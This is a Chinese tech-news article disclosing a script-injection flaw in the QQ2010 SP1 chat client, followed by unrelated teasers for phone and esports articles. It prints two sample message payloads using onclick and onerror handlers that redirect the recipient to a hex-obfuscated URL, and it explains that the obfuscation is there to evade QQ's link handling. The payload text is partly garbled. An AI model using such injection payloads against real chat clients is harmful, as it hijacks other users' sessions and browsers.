網名館騰訊QQ2010SP1正式版驚現低級漏洞
騰訊QQ一向是騰訊主打的產品,意想不到前天發佈的QQ2010SP1竟然有如此大漏洞。用户可以隨意在消息中使用Javascript、Html,騰訊並沒有對此進行有效的屏蔽,如此低級漏洞,在QQ這樣的軟件中出現實屬罕見。
截止發稿之日起,騰訊還沒有對此漏洞給出解決辦法,網友只有去下載試用QQ2010正式版來避免此問題。
點擊下載:QQ2010SP1正式版
首先囧一下:腳本出錯還會提示錯誤
1、消息記錄的Javascript、Html標籤沒有屏蔽
2、消息盒子Javascript、Html標籤沒有屏蔽
3、小實驗
1、發送代碼:<input onclick="tion=’x68x74x74x70x3ax2fx2fx77x77x77x2ex62x6fx77x6fx73x2ex63x6fx6d’" />
因為騰訊會自動將url轉換,我們必須混淆url才能發送
4、超牛代碼
<img src=’tetet’ onerror="tion=’x68x74x74x70x3ax2fx2fx77x77x77x2ex62x6fx77x6fx73x2ex63x6fx6d’"/>
因為要點擊才能觸發,想到一個不用點擊就能觸發的代碼。
5、希望騰訊快點修復,這個漏洞非同小可
6、本漏洞由TGL發現。
![紅米note12turbo測評 紅米note12turbo值得買嗎]( "紅米note12turbo測評 紅米note12turbo值得買嗎")
紅米note12turbo測評 紅米note12turbo值得買嗎
近日紅米note12turbo發佈了,而且1TB只要2599元,簡直是鯊瘋了,目前網上也有好多博主拿到了一手的相關測評,目前來説紅米note12turbo還是很值得入手的,下面就和小編一起來看看吧。紅米note12turbo測評亮點驍龍7+Gen1搭配狂暴引擎,跑分超百萬,性能非常頂最大16+1TB大內存...
![iPhone14充電口是什麼接口 iPhone14充電需要多久]( "iPhone14充電口是什麼接口 iPhone14充電需要多久")
iPhone14充電口是什麼接口 iPhone14充電需要多久
這次iPhone14發售依然不配備充電器,這對於沒有充電器的朋友們來説確實很不方便。如果是type-c充電口就好了,不過這也只是一種念想。那麼此次iPhone14是什麼充電口呢?續航怎麼樣呢?來看看吧!iPhone14充電口是什麼接口iphone14充電口是Lightning接口。蘋果公司在測試...
![ios15.6續航怎麼樣?ios15.6續航測評]( "ios15.6續航怎麼樣?ios15.6續航測評")
ios15.6續航怎麼樣?ios15.6續航測評
近日ios15.6終於來了,本次更新距離上次發佈隔了65天,這次更新的話主要修復了設備仍有儲存空間可用時,可能一直會顯示儲存空間已滿的問題,那ios15.6正式版怎麼樣?續航有提升嗎?下面就和小編一起來看看吧。ios15.6續航怎麼樣?千呼萬喚,蘋果終於在今日凌晨推送了iOS15.6正...
![rng入圍賽什麼時候打?在哪打?rng入圍賽直播哪裏看?]( "rng入圍賽什麼時候打?在哪打?rng入圍賽直播哪裏看?")
rng入圍賽什麼時候打?在哪打?rng入圍賽直播哪裏看?
今日S12入圍賽最後一場將迎來RNG對陣DRX的比賽,由於前期的比賽出現了暫停,原定於北京時間11點的比賽將推遲至13點左右,小夥伴們是不是很期待,下面就和小編一起來看看RNG入圍賽的相關賽程。rng入圍賽什麼時候打?在哪打?因為此次全球總決賽是在北美舉辦,與北京時間有着...
相關文章
- 騰訊qq2014 Beta體驗版月底內測 SP5正式版下載發佈
- 騰訊qq2013正式版sp4誠邀您體驗 文件轉發功能升級
- 2011年騰訊QQ最新版本發佈 QQ2010正式版SP3.1下載
- QQ2010SP1正式版功能介紹 qq2010正式版SP1官方下載
- 騰訊qq2013正式版SP4全員發佈了 版本號為8796
- 騰訊QQ2010正式版SP3.1優先體驗 我的QQ我做主
- QQ2010正式版SP2.1 簡體版全新體驗 QQ2010正式版SP2.1官方下載
- 騰訊qq2013正式版SP5誠邀您體驗 羣視頻聊天新增教育模式
- QQ2010正式版SP1發佈 QQ現在集成了瀏覽器窗口
- 騰訊QQ2010正式版SP3下載 QQ會員優先體驗